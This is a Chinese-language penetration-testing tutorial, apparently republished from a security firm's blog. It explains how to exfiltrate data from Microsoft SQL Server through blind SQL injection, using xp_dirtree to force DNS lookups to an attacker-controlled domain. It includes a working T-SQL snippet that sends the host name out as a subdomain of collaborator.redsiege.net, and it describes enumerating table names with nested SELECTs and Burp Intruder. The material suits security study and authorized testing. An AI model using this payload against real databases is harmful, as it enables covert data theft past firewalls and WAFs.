如何使用DNS和SQLi從庫(kù)中獲取數(shù)據(jù)樣本

這期內(nèi)容當(dāng)中小編將會(huì)給大家?guī)?lái)有關(guān)如何使用DNS和SQLi從庫(kù)中獲取數(shù)據(jù)樣本，文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

泄露數(shù)據(jù)的方法有許多，但你是否知道可以使用DNS和SQLi從數(shù)據(jù)庫(kù)中獲取數(shù)據(jù)樣本？下面我將為大家介紹一些利用SQL盲注從DB服務(wù)器枚舉和泄露數(shù)據(jù)的技術(shù)。

在最近的一個(gè)Web應(yīng)用測(cè)試中，我發(fā)現(xiàn)了一個(gè)潛在的SQLi漏洞。使用Burp的Collaborator服務(wù)通過(guò)DNS交互最終我確認(rèn)了該SQL注入漏洞的存在。我嘗試使用SQLmap進(jìn)行一些額外的枚舉和泄露，但由于SQLmap header的原因WAF阻止了我的請(qǐng)求。我需要另一種方法來(lái)驗(yàn)證SQLi并顯示可以從服務(wù)器恢復(fù)數(shù)據(jù)。

在之前的文章中，我向大家展示了如何使用xp_dirtree通過(guò)SQLi來(lái)捕獲SQL Server用戶哈希值的方法。這里我嘗試了相同的方法，但由于客戶端防火墻上的出站過(guò)濾而失敗了。此外，在上篇文章中我還引用了GracefulSecurity的文章內(nèi)容，而在本文中它也將再次派上用場(chǎng)。

即使有出站過(guò)濾，xp_dirtree仍可用于從網(wǎng)絡(luò)中泄露數(shù)據(jù)。這是因?yàn)镾QL服務(wù)器必須在xp_dirtree操作的目標(biāo)上執(zhí)行DNS查找。因此，我們可以將數(shù)據(jù)添加為域名的主機(jī)或子域部分。例如，如果我在collaborator.redsiege.net上設(shè)置DNS服務(wù)器，我可以強(qiáng)制xp_dirtree在data.collaborator.redsiege.net上執(zhí)行DNS查找，我的DNS服務(wù)器將接收該主機(jī)的查詢，允許我提取來(lái)自請(qǐng)求的數(shù)據(jù)?？赡苓@么說(shuō)你還有些混亂，我們通過(guò)一個(gè)實(shí)例來(lái)講解。

請(qǐng)思考以下代碼：

DECLARE @data varchar(1024);
SELECT @data = (SELECT HOST_NAME()); 
EXEC('master.dbo.xp_dirtree "\\'+@data+'.collaborator.redsiege.net\foo$"');

在此SQL查詢中，我們聲明了一個(gè)名為data的變量，我們使用SELECT HOST_NAME()的結(jié)果來(lái)填充該變量，然后在\\hostname.collaborator.redsiege.net上嘗試xp_dirtree。

我的測(cè)試系統(tǒng)名為INTRUDER。在我的測(cè)試系統(tǒng)上執(zhí)行這個(gè)查詢導(dǎo)致了對(duì)INTRUDER.collaborator.redsiege.net的查找，如下所示。

在這一點(diǎn)上，我知道有一種可靠的方法可以來(lái)泄露數(shù)據(jù)，即使需要手動(dòng)完成。當(dāng)然，對(duì)于這個(gè)演示我使用SQL Server Management Studio來(lái)顯示結(jié)果發(fā)出查詢，但實(shí)際上這與通過(guò)SQLi實(shí)現(xiàn)這一點(diǎn)并沒(méi)有太大區(qū)別，唯一的不同就是需要對(duì)部分查詢進(jìn)行URL編碼。

在下面的示例中，紅框中的查詢語(yǔ)句將會(huì)為我們從Northwind數(shù)據(jù)庫(kù)中返回表名。

在該查詢中你應(yīng)該已經(jīng)注意到了有2個(gè)SELECT語(yǔ)句。內(nèi)部SELECT語(yǔ)句（在上面截圖中調(diào)用的）返回Northwind數(shù)據(jù)庫(kù)中表名的前10個(gè)結(jié)果，并按升序字母順序排序。然后，外部（第一個(gè)）SELECT語(yǔ)句選擇按字母順序降序排序的結(jié)果集的第一個(gè)結(jié)果。此查詢的結(jié)果是我們檢索Northwind數(shù)據(jù)庫(kù)中第10個(gè)表的名稱。你是不是感到有些疑惑？讓我們來(lái)分解下。

以下內(nèi)部的SELECT語(yǔ)句，它將返回10個(gè)結(jié)果并按升序字母順序排序。

如下所示，完整的查詢只返回第10個(gè)表的名稱。這是因?yàn)槲覀兪紫确祷亓?0個(gè)結(jié)果，并按升序字母順序排序，然后我們又執(zhí)行了第二個(gè)SELECT，其中只返回按降序字母順序排序的第一個(gè)結(jié)果。這樣一來(lái)查詢結(jié)果將只會(huì)為我們返回表名列表中的第10個(gè)結(jié)果。

知道了這一點(diǎn)后，我們就可以使用Intruder迭代所有可能的表名，只需修改第二個(gè)SELECT語(yǔ)句并增加每個(gè)請(qǐng)求中的結(jié)果數(shù)即可。

上述就是小編為大家分享的如何使用DNS和SQLi從庫(kù)中獲取數(shù)據(jù)樣本了，如果剛好有類似的疑惑，不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識(shí)，歡迎關(guān)注億速云行業(yè)資訊頻道。